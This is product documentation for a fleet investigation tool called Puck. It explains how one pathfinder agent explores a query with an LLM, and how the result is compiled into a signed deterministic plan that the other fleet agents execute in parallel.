Pathfinder vs fleet agents

When you submit an investigation, Puck sends one agent ahead to explore the question deeply — then compiles what it learned into a deterministic plan for the rest of the fleet to execute in parallel.

This is an Enterprise feature. OSS has the same “exploration before fleet-wide execution” idea conceptually, but it’s driven by your AI client (Claude Code, Cursor) calling puck_investigate against one host first and then puck_query_fleet for the rest — no brain-side pathfinder service.

Why it exists

Running a full multi-turn LLM conversation on every endpoint in your fleet would be slow and expensive. A 200-agent fleet with a five-iteration pathfinder conversation would require a thousand LLM round-trips before a single finding was classified.

The split exists because exploration and execution are different problems. Exploration is creative: it requires a model that can reason about what it found, decide what to check next, and follow unexpected threads. Execution is mechanical: it requires agents that consistently run the same steps and report back reliably. Paying for exploration on every agent wastes the cost; doing execution through an LLM loop wastes the reliability.

The pathfinder phase answers “what should we look for?” The fleet phase answers “is it here, on every machine?”

How it works

flowchart LR
    Q[Query] --> PF[Pathfinder agent\none per OS]
    PF -->|multi-turn LLM| TSCR[Pathfinder\ntranscript]
    TSCR --> BR[Blast radius\ndecision]
    BR -->|TARGETED or FLEET_WIDE| PLAN[Compiled\nsigned plan]
    PLAN --> F1[Fleet agent 1]
    PLAN --> F2[Fleet agent 2]
    PLAN --> FN[Fleet agent N]
    BR -->|NO_ACTION| RPT[Report from\npathfinder only]

Pathfinder: The brain selects one idle agent per target OS from the connected fleet — preferring the longest-connected non-stale agent. That agent enters a multi-turn exploration loop with the brain’s LLM, with a default cap of five iterations. Each iteration asks the LLM to request a set of commands, runs them on the pathfinder host, and feeds the results back for a review turn. The loop exits when the LLM reaches a confidence of at least 0.6 with no remaining gaps, or when the iteration cap is hit. The full transcript — including what was found, what was decided, and why — is preserved as an artifact.

Plan compilation: If the blast-radius decision calls for fleet distribution, the pathfinder transcript becomes the input to the plan compiler. The compiler asks a standard-tier LLM to produce a Plan JSON: a sequence of steps with conditional branches, anomaly weights, and deviation triggers. The brain re-asserts the investigation ID (the LLM-supplied value is not trusted), signs the plan with Ed25519, and distributes it.

Fleet execution: Fleet agents are deterministic. They poll for plans, verify the Ed25519 signature before running anything, execute steps in order through Tier 1 (scripted) and Tier 2 (conditional branches using template variables from prior steps), and call home to the brain (Tier 3) only when a deviation trigger fires on something unexpected. No LLM runs on the fleet agent. No round-trips between steps. The agent just executes the plan and posts results.

When you’d touch it

Most of the time you don’t. The pathfinder-fleet split is automatic.

Two tag policy fields give you influence over the pathfinder phase on specific agents:

max_pathfinder_turns — caps the iteration count for investigations involving a tagged agent as pathfinder. Use this on expensive or sensitive hosts where you want shorter explorations.
extra_system_prompt — appended to the pathfinder system prompt as a ## Host context (operator policy) section. Use this to give the pathfinder agent context about the host’s role (“this is a CI runner — ignore build artifact paths”).

Both are set in Console → Settings → Tag policies and apply based on the labels the agent carries at install time.

Pathfinder vs fleet agents

Why it exists

How it works

When you’d touch it

Related